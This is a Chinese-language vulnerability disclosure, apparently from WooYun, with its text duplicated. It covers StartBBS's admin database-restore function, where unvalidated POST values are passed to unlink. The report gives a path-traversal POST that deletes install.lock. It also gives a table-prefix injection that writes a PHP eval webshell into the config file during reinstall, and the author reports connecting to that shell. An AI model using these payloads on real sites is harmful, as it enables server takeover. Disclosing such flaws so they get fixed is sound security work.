### 简要描述:
找了好半天,感觉没太好的后台getshell的方法。
分析我以前交的一个前台getshell漏洞(http://wooyun.org/bugs/wooyun-2013-045143),就是通过重装来getshell的(最新版本v1.1.5任意重装的洞已经修了,但重装的位置依旧可以getshell),那么如果有一个任意文件删除洞的话,岂不就能删除.lock文件,来重新安装了呢?来getshell了呢?
我之前也一直用CI做开发,常参考startbbs的源码,在这里说声谢谢~
### 详细说明:
后台代码app/controllers/admin/db_admin.php 75行
```
public function restore($sqlfile='')
{
$data['title'] = '数据库还原';
$data['act']=$this->uri->segment(3);
$data['sqlfiles'] = get_dir_file_info(FCPATH.'data/backup', $top_level_only = TRUE);
if($_POST){
$sqlfiles=array_slice($this->input->post(), 0, -1);
//echo var_export($sqlfiles);
foreach($sqlfiles as $k=>$v){
unlink(FCPATH.'data/backup/'.$v);
}
$this->session->set_flashdata('error', '删除sql文件成功!');
redirect('admin/db_admin/restore');
}
if($sqlfile){
$sql = file_get_contents(FCPATH.'data/backup/'.$sqlfile);
if($this->run_sql($sql)){
$this->session->set_flashdata('error', '还原sql文件成功!');
redirect('admin/db_admin/restore');
}
}
$this->load->view('db_admin', $data);
}
```
这是一个进行数据库还原操作的函数,其中可以对已经备份好的数据库文件进行删除。但是没有验证文件名,导致可以任意文件删除。
代码直接取POST数组(最后一个变量除外,不知为什么),用foreach遍历之,然后删除所有$_POST数组中的值。
详见漏洞证明。
### 漏洞证明:
登录后台,直接向index.php/admin/db_admin/restore/这个地址POST数据a=../../install.lock&b=x,想删除多少文件都行(加POST数组内容即可,键名随意,键值是你要删除的文件位置),但我只删除安装锁,.lock文件。
[<img src="https://images.seebug.org/upload/201405/11213639593d771b10fea0fed5de16b930a3cbf0.jpg" alt="009.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/11213639593d771b10fea0fed5de16b930a3cbf0.jpg)
如上图,提示删除成功了。来到前台首页,发现跳转到安装页面了:
[<img src="https://images.seebug.org/upload/201405/1121392114678448c85aaf244c90cf1e240d3eef.jpg" alt="010.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1121392114678448c85aaf244c90cf1e240d3eef.jpg)
顺理成章,重装系统。找一个可以外连的数据库,填好信息,然后在表前缀的位置填入一句话:
```
sb_';phpinfo();@eval ($_POST[101]);$xxx='
```
[<img src="https://images.seebug.org/upload/201405/112143580e931956467aae289ce5ed474506e9f9.jpg" alt="011.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/112143580e931956467aae289ce5ed474506e9f9.jpg)
安装好以后,访问首页就能看到phpinfo了。菜刀直接连index.php,连数据库配置文件是不行的。
[<img src="https://images.seebug.org/upload/201405/1121455066f0e3d4b594bd46782addc2c81848a2.jpg" alt="012.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/1121455066f0e3d4b594bd46782addc2c81848a2.jpg)
查看数据库配置文件,发现马已经安静地躺在那里了:
[<img src="https://images.seebug.org/upload/201405/11214808a65b574f16cfdde6f534df97516f5540.jpg" alt="013.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/11214808a65b574f16cfdde6f534df97516f5540.jpg)
简要描述:
找了好半天,感觉没太好的后台getshell的方法。
分析我以前交的一个前台getshell漏洞(http://wooyun.org/bugs/wooyun-2013-045143),就是通过重装来getshell的(最新版本v1.1.5任意重装的洞已经修了,但重装的位置依旧可以getshell),那么如果有一个任意文件删除洞的话,岂不就能删除.lock文件,来重新安装了呢?来getshell了呢?
我之前也一直用CI做开发,常参考startbbs的源码,在这里说声谢谢~
详细说明:
后台代码app/controllers/admin/db_admin.php 75行
public function restore($sqlfile='')
{
$data['title'] = '数据库还原';
$data['act']=$this->uri->segment(3);
$data['sqlfiles'] = get_dir_file_info(FCPATH.'data/backup', $top_level_only = TRUE);
if($_POST){
$sqlfiles=array_slice($this->input->post(), 0, -1);
foreach($sqlfiles as $k=>$v){
unlink(FCPATH.'data/backup/'.$v);
}
$this->session->set_flashdata('error', '删除sql文件成功!');
redirect('admin/db_admin/restore');
}
if($sqlfile){
$sql = file_get_contents(FCPATH.'data/backup/'.$sqlfile);
if($this->run_sql($sql)){
$this->session->set_flashdata('error', '还原sql文件成功!');
redirect('admin/db_admin/restore');
}
}
$this->load->view('db_admin', $data);
}
这是一个进行数据库还原操作的函数,其中可以对已经备份好的数据库文件进行删除。但是没有验证文件名,导致可以任意文件删除。
代码直接取POST数组(最后一个变量除外,不知为什么),用foreach遍历之,然后删除所有$_POST数组中的值。
详见漏洞证明。
漏洞证明:
登录后台,直接向index.php/admin/db_admin/restore/这个地址POST数据a=../../install.lock&b=x,想删除多少文件都行(加POST数组内容即可,键名随意,键值是你要删除的文件位置),但我只删除安装锁,.lock文件。
如上图,提示删除成功了。来到前台首页,发现跳转到安装页面了:
顺理成章,重装系统。找一个可以外连的数据库,填好信息,然后在表前缀的位置填入一句话:
sb_';phpinfo();@eval ($_POST[101]);$xxx='
安装好以后,访问首页就能看到phpinfo了。菜刀直接连index.php,连数据库配置文件是不行的。
查看数据库配置文件,发现马已经安静地躺在那里了:
京公网安备 11010502034610号
暂无评论